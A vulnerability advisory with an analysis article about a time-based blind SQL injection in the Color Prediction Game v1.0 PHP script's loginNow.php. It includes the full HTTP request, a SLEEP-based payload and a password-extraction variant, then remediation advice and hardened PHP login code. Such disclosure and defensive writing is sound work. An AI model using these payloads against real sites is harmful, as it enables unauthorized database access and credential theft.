Color Prediction Game v1.0 - SQL Injection
# Exploit Title: Color Prediction Game v1.0 - SQL Injection
# Date: 2023-08-12
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor: https://www.codester.com/items/44411/color-prediction-game-php-script
# Tested on: Kali Linux & MacOS
# CVE: N/A
### Request ###
POST /loginNow.php HTTP/1.1
Host: localhost
Cookie: PHPSESSID=250594265b833a4d3a7adf6e1c136fe2
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: */*
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------395879129218961020344050490865
Content-Length: 434
Origin: http://localhost
Referer: http://localhost/login.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
-----------------------------395879129218961020344050490865
Content-Disposition: form-data; name="login_mobile"
4334343433
-----------------------------395879129218961020344050490865
Content-Disposition: form-data; name="login_password"
123456
-----------------------------395879129218961020344050490865
Content-Disposition: form-data; name="action"
login
-----------------------------395879129218961020344050490865--
### Parameter & Payloads ###
Parameter: MULTIPART login_mobile ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: -----------------------------395879129218961020344050490865
Content-Disposition: form-data; name="login_mobile"
4334343433' AND (SELECT 4472 FROM (SELECT(SLEEP(5)))UADa) AND 'PDLW'='PDLW
-----------------------------395879129218961020344050490865
Content-Disposition: form-data; name="login_password"
123456
-----------------------------395879129218961020344050490865
Content-Disposition: form-data; name="action"
login
-----------------------------395879129218961020344050490865--

Color Prediction Game v1.0 – SQL Injection Vulnerability Analysis
Security vulnerabilities in web applications remain a persistent threat, especially in small commercial or open-source scripts that receive little code review. One such example is the Color Prediction Game v1.0, a PHP-based script sold on Codester. Despite its seemingly innocuous purpose (predicting colors in a game-like interface), it harbors a critical SQL Injection flaw that lets an attacker manipulate the login query through crafted input.
Exploit Overview: Time-Based Blind SQL Injection
The vulnerability was discovered and reported by cybersecurity researcher Ahmet Ümit Bayram on August 12, 2023. The exploit targets the loginNow.php endpoint, which handles user authentication via a multipart/form-data POST request. The attack leverages a time-based blind SQL injection technique, allowing attackers to infer database behavior by observing delays in response times.
This method is particularly effective when direct data retrieval is not possible—common in environments where error messages are suppressed or filtered. The attacker injects a payload that causes the database to sleep for a defined duration, enabling detection of successful injection based on observed latency.
Attack Vector: POST Request with Custom Payload
The exploit uses the following request structure:
POST /loginNow.php HTTP/1.1
Host: localhost
Cookie: PHPSESSID=250594265b833a4d3a7adf6e1c136fe2
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: */*
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------395879129218961020344050490865
Content-Length: 434
Origin: http://localhost
Referer: http://localhost/login.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
-----------------------------395879129218961020344050490865
Content-Disposition: form-data; name="login_mobile"
4334343433' AND (SELECT 4472 FROM (SELECT(SLEEP(5)))UADa) AND 'PDLW'='PDLW
-----------------------------395879129218961020344050490865
Content-Disposition: form-data; name="login_password"
123456
-----------------------------395879129218961020344050490865
Content-Disposition: form-data; name="action"
login
-----------------------------395879129218961020344050490865--
Key components of this request:
- Parameter: login_mobile, the vulnerable field.
- Method: multipart/form-data, standard for file uploads, but used here to bypass input sanitization. Note that the encoding itself is not the flaw: PHP still delivers the field in $_POST, and the value reaches the query without being sanitized or parameterized.
- Payload: ' AND (SELECT 4472 FROM (SELECT(SLEEP(5)))UADa) AND 'PDLW'='PDLW, a time-based blind injection.
How the Payload Works: SQL Injection Mechanics
Let’s break down the injected payload:
' AND (SELECT 4472 FROM (SELECT(SLEEP(5)))UADa) AND 'PDLW'='PDLW
This is a classic time-based blind SQL injection payload designed for MySQL databases (version ≥ 5.0.12). Here is what each part does:
- ' closes the string literal the application built around the input and introduces SQL injection.
- AND (SELECT 4472 FROM (SELECT(SLEEP(5)))UADa) is the core of the exploit. The SLEEP(5) function pauses query execution for 5 seconds.
- UADa is a dummy alias; MySQL requires every derived table in a FROM clause to have one.
- AND 'PDLW'='PDLW is an always-true condition that re-closes the string context so the statement remains syntactically valid.
When the database processes this query, it will execute SLEEP(5), causing a 5-second delay. If the server response takes longer than expected, the attacker knows the injection succeeded.
Why This is Dangerous
Time-based blind SQL injection may seem less impactful than classic data-extraction attacks, but it is a powerful tool in the hands of skilled attackers. It allows for:
- Confirming the presence of SQL injection vulnerabilities.
- Enumerating database version and structure.
- Extracting sensitive data through sequential probing (e.g., using ORD() and CHAR() functions).
- Escalating to full database compromise, including user credentials, session tokens, and configuration files.
Moreover, the vulnerability is not limited to the login endpoint. If similar input sanitization failures exist elsewhere in the codebase—such as in registration, game history, or admin panels—the entire system could be at risk.
Real-World Implications
Consider a scenario where an attacker uses this exploit to:
- Verify if the database is MySQL.
- Test if the application is vulnerable to SQL injection.
- Automate data extraction by probing each character of a password using SLEEP() and CHAR() functions.
For example, to extract the first character of a user password:
' AND (SELECT 4472 FROM (SELECT(SLEEP(5)))UADa WHERE ASCII(LEFT((SELECT password FROM users WHERE id=1),1))=100) AND 'PDLW'='PDLW
By adjusting the ASCII value (e.g., 100 for 'd'), the attacker can confirm the character via response delay.
Remediation & Security Best Practices
Developers must adopt robust security practices to prevent such vulnerabilities:
- Input Validation: Always validate user input against an allow-list or a strict pattern (a mobile number, for instance, should be digits only).
- Prepared Statements: Use parameterized queries (e.g., PDO::prepare() or mysqli_stmt_prepare()) so that user input is never concatenated into SQL text; this is the control that actually eliminates SQL injection.
- Database Abstraction: Avoid hand-built SQL; use an ORM or query builder such as Laravel's Eloquent or Doctrine, which parameterize by default.
- Security Headers: Enable X-Content-Type-Options: nosniff and Content-Security-Policy to reduce the overall attack surface. These headers do not prevent SQL injection; they belong to defense in depth.
- Regular Audits: Conduct penetration testing and code reviews, especially for cheap or open-source scripts before deploying them.
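As an added example (not the vendor's code, whose source the advisory does not publish), the following shows how a loginNow.php handler can be written so that the login_mobile field can never alter the query. The table and column names (users, mobile, password_hash), the DSN and the credentials are assumptions.

```php
<?php
declare(strict_types=1);

// Assumed vulnerable pattern (illustrative only): the field is spliced into the SQL text,
// so a quote in login_mobile followed by SLEEP(5) becomes part of the statement.
//   $sql = "SELECT id FROM users WHERE mobile = '" . $_POST['login_mobile'] . "'";

// Hardened version: validate the shape of the input, then bind it as a parameter.
function login_user(PDO $pdo, string $mobile, string $password): ?array
{
    // Allow-list validation: a mobile number is digits only (length bounds assumed).
    if (!preg_match('/^\d{6,15}$/', $mobile)) {
        return null;
    }
    // Parameterised query: the value is sent separately from the SQL text, so the
    // database treats the whole string as data and never as a SLEEP() expression.
    $stmt = $pdo->prepare('SELECT id, mobile, password_hash FROM users WHERE mobile = :mobile LIMIT 1');
    $stmt->execute([':mobile' => $mobile]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false || !password_verify($password, $row['password_hash'])) {
        return null;
    }
    return ['id' => (int) $row['id'], 'mobile' => $row['mobile']];
}

// Connection settings: exceptions on error and real server-side prepares
// (client-side emulation would fall back to quoting instead of binding).
$pdo = new PDO('mysql:host=localhost;dbname=colorgame;charset=utf8mb4', 'app_user', 'app_password', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false,
]);

// The multipart/form-data fields from the advisory's request arrive in $_POST.
if (($_POST['action'] ?? '') === 'login') {
    $user = login_user(
        $pdo,
        (string) ($_POST['login_mobile'] ?? ''),
        (string) ($_POST['login_password'] ?? '')
    );
    header('Content-Type: application/json');
    // Same generic response for unknown user and wrong password: no information leak.
    echo json_encode($user !== null ? ['ok' => true, 'id' => $user['id']] : ['ok' => false]);
}
```

With this handler the advisory's payload fails the digits-only check before any SQL is run, and even a value that passed validation would be bound as a string rather than parsed as SQL.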
Conclusion
The Color Prediction Game v1.0 serves as a stark reminder that even simple applications can harbor critical vulnerabilities. The time-based blind SQL injection in loginNow.php underscores the importance of secure coding practices, especially in PHP-based web applications. Developers should never assume that "small" projects are immune to attacks—security is a continuous process, not a one-time fix.
For end-users, always verify the source and integrity of downloaded scripts. Avoid using unverified open-source code in production environments. When in doubt, perform a security audit or consult a professional penetration tester.